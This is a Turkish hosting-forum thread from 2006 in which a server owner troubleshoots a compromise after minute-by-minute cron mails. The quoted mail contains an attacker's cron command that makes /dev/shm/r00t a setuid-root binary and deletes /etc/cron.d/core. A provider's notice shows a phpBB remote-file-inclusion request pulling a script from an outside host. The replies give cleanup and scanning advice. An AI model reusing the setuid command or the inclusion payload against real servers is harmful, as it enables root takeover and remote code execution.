• 16-12-2006, 08:36:55
    #1
    Benim Sorunum Şu Bana Serverımdan Her Dakika
    “Cron Daemon Mailadres: root@xxx.alanadım.org” adresinden
    “Cron <root@php> chown root:root /dev/shm/r00t && chmod 4755 /dev/shm/r00t && rm -rf /etc/cron.d/core && kill -USR1 21944”
    konusu ile
    /bin/sh: line 0: kill: (21944) - No such process
    İçerikli mail geliyor
    Muhtemelen Exploit gibi aklıma geliyor.
    Sunucunun Bulunduğu Firmadan
    ---------------
    NOTES: Cease & Desist the attempted upload of malicious code for a known PHPBB vulnerability. Work through the Exploit Removal
    Instructions located below my signature block.
    Date & Time: 2006-12-11 17:24:48 -0500 GMT (EST) Blocked IP: 72.36.206.74 User Agent: libwww-perl/5.805 Request URI: /forums/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://albaniannetwork.ch/httpds/lol.txt?
    --------------------------
    Şeklinde Mail Aldım
    Bende
    chmod 0750 `which curl` 2>&-; chmod 0750 `which fetch` 2>&-; chmod 0750 `which wget` 2>&-
    ve
    sh
    for x in "/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp"; do ls -loAFR $x 2>&- | grep -E "^$|^/| apache | nobody | unknown | www | web | htdocs " | grep -E "^$|^/|/$|\\*$|\\.pl$" | grep -Ev "sess_" | tee exploits.txt; done; echo -e "\\n\\nPossible Exploit Files and Directories: `grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' '`" | tee -a exploits.txt
    exit




    Işlemlerini Yaptım Ama Hala Sorun Çözülmedi
    Sunucuya
    clamav-0.88.7 ve rkhunter-1.2.8 kurdum
    Yardımlarınız Için Şimdiden Sonsuz Teşekürler…
  • 16-12-2006, 21:16:29
    #2
    Kurumsal PLUS
    rkhunter-1.2.8 rootkit benzeri şeyleri temizlemez sadece gösterir bir anormal durumda hemen yedeklerini alır basarsın formatı ancak bu zamanlanmış görevden geliyor

    shm içindeki r00t nedir bunu çözemedim açıkcası crontab -e yazarmısın bi.. neler var
  • 16-12-2006, 21:22:57
    #3
    Misafir
    .......................
  • 17-12-2006, 01:57:31
    #4
    crontab -e
    yazınca bunlar çıktı


    3 2 * * * /scripts/upcp
    0 1 * * * /scripts/cpbackup
    */15 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
    2,58 * * * * /usr/local/bandmin/bandmin
    0 0 * * * /usr/local/bandmin/ipaddrmap
    26 21 * * * /usr/local/cpanel/whostmgr/docroot/cgi/cpaddons_report.pl --notify
    37 15 * * * cd /usr/local/cpanel/whostmgr/docroot/cgi/fantastico/scripts/ ; /usr/local/cpanel/3rdparty/bin/php cron.php > /dev/null 2>&1
    0 6 * * * /scripts/exim_tidydb > /dev/null 2>&1
    */5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1
    x
  • 17-12-2006, 02:10:23
    #5
    Kurumsal PLUS
    hocam sen birşey kurmuşsun yada mod_sec.. falan

    /forums/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://albaniannetwork.ch/httpds/lol.txt?

    eleman böyle birşey yapınca onu banlıyor çinli sanırım pek önemli birşey değil ama bu güvenlik sistemi gibi bişi

    ancak shm ye r00t ne anlamadım onu
  • 17-12-2006, 02:16:22
    #6
    gelen mailin içeriği tam bu
    chown: cannot access `/dev/shm/r00t': No such file or directory
    ve mailler halen gliyo kaç bin oldu anlamadım
    sanırım exploit ama ben çözemedim
  • 17-12-2006, 05:24:34
    #7
    Kurumsal PLUS
    8) otomatik diyorsun yani...

    /forums/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://albaniannetwork.ch/httpds/lol.txt?

    şuradaki dizini değiştirsene bi forum olsun forums yerine hangi site bu?
  • 18-12-2006, 04:13:38
    #8
    locate admin_styles.php
    komutu ile aratım tüm admin_styles.php dosyalarını sildim
    sorun devam ediyor
  • 18-12-2006, 08:06:40
    #9
    Kurumsal PLUS
    başına bela oldu desene 8) ne yapsak sana ya görmeden aklıma bişi gelmiyor ama söyle yap bakalım önce df yazıp çıktıyı buraya yaz hoca sen şu shm ney çözelim swap içine nası r00t var anlamadım birde etc/cron.d/core ve etc/cron.d buralarda neler var bir bak belki crontab -e olarak kayıtlı değildir zamanlanmış görev